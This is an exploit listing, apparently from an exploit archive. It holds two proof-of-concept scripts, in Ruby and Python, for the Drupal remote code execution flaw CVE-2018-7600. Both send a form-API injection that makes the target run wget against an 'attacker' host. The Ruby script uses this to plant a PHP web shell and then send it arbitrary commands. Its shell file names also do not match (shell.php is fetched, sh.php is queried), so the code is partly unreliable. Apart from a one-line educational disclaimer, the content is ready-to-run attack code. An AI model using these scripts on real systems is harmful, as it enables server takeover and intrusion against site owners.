Exploit for php platform in category web applications
require 'net/http'
# Hans Topo ruby port from Drupalggedon2 exploit.
# Based on Vitalii Rudnykh exploit
target = ARGV[0]
command = ARGV[1]
url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
shell = "<?php system($_GET['cmd']); ?>"
payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec'
uri = URI(url)
http = Net::HTTP.new(uri.host,uri.port)
if uri.scheme == 'https'
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
req = Net::HTTP::Post.new(uri.path)
req.body = payload
response = http.request(req)
if response.code != "200"
puts "[*] Response: " + response.code
puts "[*] Target seems not to be exploitable"
exit
end
puts "[*] Target seems to be exploitable."
exploit_uri = URI(target+"/sh.php?cmd=#{command}")
response = Net::HTTP.get_response(exploit_uri)
puts response.body
----------------------Exploit PoC 2---------------------------
import sys
import requests
print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')
target = raw_input('Enter target url (example: https://domain.ltd/): ')
url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'}
r = requests.post(url, data=payload)
if r.status_code != 200:
sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')
# 0day.today [2018-04-14] #